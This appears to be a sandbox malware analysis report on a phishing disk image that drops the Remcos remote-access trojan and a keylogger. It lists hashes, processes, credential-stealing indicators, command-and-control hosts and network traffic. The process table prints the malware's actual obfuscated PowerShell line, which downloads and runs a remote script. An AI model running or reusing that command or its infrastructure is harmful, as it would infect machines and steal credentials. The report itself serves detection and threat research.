analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

191206_payment_remittance.img

Full analysis: https://app.any.run/tasks/ab751574-afcb-4988-b67f-991d8f723d42
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: December 06, 2019, 19:26:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
opendir
rat
remcos
keylogger
stealer
Indicators:
MIME: application/x-iso9660-image
File info: UDF filesystem data (version 1.5) '191206_PAYMENT_REMITTANCE'
MD5:

DA1F11467ADD18746090DDDFFE5A10E9

SHA1:

7F1F231B20E82180717A3480DA09B552FB7A5A54

SHA256:

92C1BBC3F4EC1417CDA4F93DE199C6BB787F6B24A78E2A8B9E0227FFBFF3B5CD

SSDEEP:

48:5DGkT2csWccTT2cNeWccUrrJAcnZ1lcJO5aBPZhPtNrAIZak6:5DG2xPxUvJ7uO5mPZxrA2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • eurb.exe (PID: 1008)
      • output.exe (PID: 2820)
      • output.exe (PID: 2308)
      • output.exe (PID: 1968)
      • output.exe (PID: 2512)
      • output.exe (PID: 2892)
    • Changes the autorun value in the registry

      • output.exe (PID: 2820)
    • REMCOS was detected

      • output.exe (PID: 1968)
    • Connects to CnC server

      • output.exe (PID: 1968)
    • Uses NirSoft utilities to collect credentials

      • output.exe (PID: 2512)
    • Actions looks like stealing of personal data

      • output.exe (PID: 2512)
    • Stealing of credential data

      • output.exe (PID: 2512)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1508)
      • output.exe (PID: 1968)
    • PowerShell script executed

      • powershell.exe (PID: 1508)
    • Reads the machine GUID from the registry

      • rundll32.exe (PID: 2420)
      • WinRAR.exe (PID: 2600)
      • powershell.exe (PID: 1508)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1508)
      • cmd.exe (PID: 2236)
    • Starts CMD.EXE for commands execution

      • eurb.exe (PID: 1008)
    • Application launched itself

      • output.exe (PID: 2820)
      • output.exe (PID: 1968)
    • Writes files like Keylogger logs

      • output.exe (PID: 1968)
  • INFO

    • Manual execution by user

      • rundll32.exe (PID: 2420)
      • powershell.exe (PID: 1508)
      • chrome.exe (PID: 608)
    • Modifies the open verb of a shell class

      • rundll32.exe (PID: 2420)
    • Application launched itself

      • chrome.exe (PID: 608)
    • Reads the hosts file

      • chrome.exe (PID: 2672)
      • chrome.exe (PID: 608)
    • Reads settings of System Certificates

      • chrome.exe (PID: 2672)
    • Reads the machine GUID from the registry

      • chrome.exe (PID: 608)
      • chrome.exe (PID: 2672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.gmc | Game Music Creator Music (13.5)
.abr | Adobe PhotoShop Brush (12)

EXIF

ISO

VolumeName: 191206_PAYMENT_REMITTANCE
VolumeBlockCount: 599
VolumeBlockSize: 2048
RootDirectoryCreateDate: 2019:12:06 06:15:12-08:00
VolumeSetName: UNDEFINED
Software: IMGBURN V2.5.8.0 - THE ULTIMATE IMAGE BURNER!
VolumeCreateDate: 2019:12:06 06:15:12.00-08:00
VolumeModifyDate: 2019:12:06 06:15:12.00-08:00

Composite

VolumeSize: 1198 kB
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
61
Monitored processes
22
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start rundll32.exe no specs rundll32.exe no specs winrar.exe no specs powershell.exe eurb.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe cmd.exe no specs output.exe #REMCOS output.exe output.exe no specs output.exe no specs output.exe

Process information

PID
CMD
Path
Indicators
Parent process
2872"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\191206_payment_remittance.imgC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2420"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\191206_payment_remittance.imgC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2600"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\191206_payment_remittance.img"C:\Program Files\WinRAR\WinRAR.exerundll32.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
1508"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $qh=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';Set-Alias s $qh;$ew=((New-Object Net.WebClient)).DownloadString('http://worldwidetechsecurity.com/American/Express/amexdata.ps1');s $ewC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1008"C:\Users\Public\eurb.exe"C:\Users\Public\eurb.exepowershell.exe
User:
admin
Company:
FINDER ECHIPAMENTE SRL
Integrity Level:
MEDIUM
Description:
Logs for Anticrash Output
Exit code:
0
Version:
69.19.20
608"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
75.0.3770.100
2544"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x84,0x88,0x8c,0x80,0x90,0x7fef3b93ef8,0x7fef3b93f08,0x7fef3b93f18C:\Program Files (x86)\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
2696"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2428 --on-initialized-event-handle=328 --parent-handle=332 /prefetch:6C:\Program Files (x86)\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
2128"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1036,11635291794100393042,15002682764359654740,131072 --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15208929543646220136 --mojo-platform-channel-handle=1052 --ignored=" --type=renderer " /prefetch:2C:\Program Files (x86)\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
2672"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1036,11635291794100393042,15002682764359654740,131072 --lang=en-US --service-sandbox-type=network --service-request-channel-token=15587706921525082056 --mojo-platform-channel-handle=1640 /prefetch:8C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Total events
3 436
Read events
3 150
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
16
Text files
74
Unknown types
3

Dropped files

PID
Process
Filename
Type
2600WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2600.48249\191206_payment_remittance.jpg.lnk
MD5:
SHA256:
1508powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EVCZI2GUGLOK8EWUU4BQ.temp
MD5:
SHA256:
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\12873906-4a1c-402a-9058-79a8670efa5c.tmp
MD5:
SHA256:
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.oldtext
MD5:14482DAD1F122C056BD265B476244053
SHA256:721C802E7AC92418185D5A461C393F93880497ECD894635FD804266E7BB41658
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF1311b6.TMPtext
MD5:E9FDF4EC197353C827F4D8498F71B0C7
SHA256:D731F13875E79464A212FB93E6C2ABB5BD50BABD082C776704F19B8DB289C1A1
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF1311d6.TMPtext
MD5:1CBD8789D5BFF9491264746A32F0D401
SHA256:D2DBBA8A2151EC760279AA04E81BD597587861F4B381AF7347F07EA98A2903E2
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.oldtext
MD5:5529291668F842DB06C63DC09A59F40D
SHA256:F2458B90D5BA8A491BDA359B89907CE6E6C653D77AA9AC89864ECCB7803B15F9
1508powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c4cea1fc8319e1ac.customDestinations-msbinary
MD5:F4016DF4CA051E6F8628B86825EA15D5
SHA256:3B81C9BB171D9F1FDDAEAD8C9AE1C4207A7AFA1E7260084F45CEDB8ACBE3E6A9
608chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:1CBD8789D5BFF9491264746A32F0D401
SHA256:D2DBBA8A2151EC760279AA04E81BD597587861F4B381AF7347F07EA98A2903E2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
12
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1508
powershell.exe
GET
200
199.188.200.95:80
http://worldwidetechsecurity.com/American/Express/amexdata.ps1
US
text
1.05 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1508
powershell.exe
199.188.200.95:80
worldwidetechsecurity.com
Namecheap, Inc.
US
malicious
1968
output.exe
174.127.99.132:5050
top.subaroone.waw.pl
SoftLayer Technologies Inc.
US
malicious
174.127.99.132:5050
top.subaroone.waw.pl
SoftLayer Technologies Inc.
US
malicious
216.58.193.67:443
www.gstatic.com
Google Inc.
US
whitelisted
2672
chrome.exe
172.217.3.195:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2672
chrome.exe
216.58.217.35:443
www.google.de
Google Inc.
US
whitelisted
2672
chrome.exe
172.217.3.202:443
fonts.googleapis.com
Google Inc.
US
unknown
2672
chrome.exe
172.217.14.205:443
accounts.google.com
Google Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
worldwidetechsecurity.com
  • 199.188.200.95
malicious
clientservices.googleapis.com
  • 172.217.3.195
whitelisted
accounts.google.com
  • 172.217.14.205
shared
www.google.de
  • 216.58.217.35
whitelisted
fonts.googleapis.com
  • 172.217.3.202
whitelisted
www.gstatic.com
  • 216.58.193.67
whitelisted
top.subaroone.waw.pl
  • 174.127.99.132
malicious

Threats

PID
Process
Class
Message
1968
output.exe
A Network Trojan was detected
REMOTE [PTsecurity] Backdoor.Win32/Remcos RAT connection
5 ETPRO signatures available at the full report
No debug info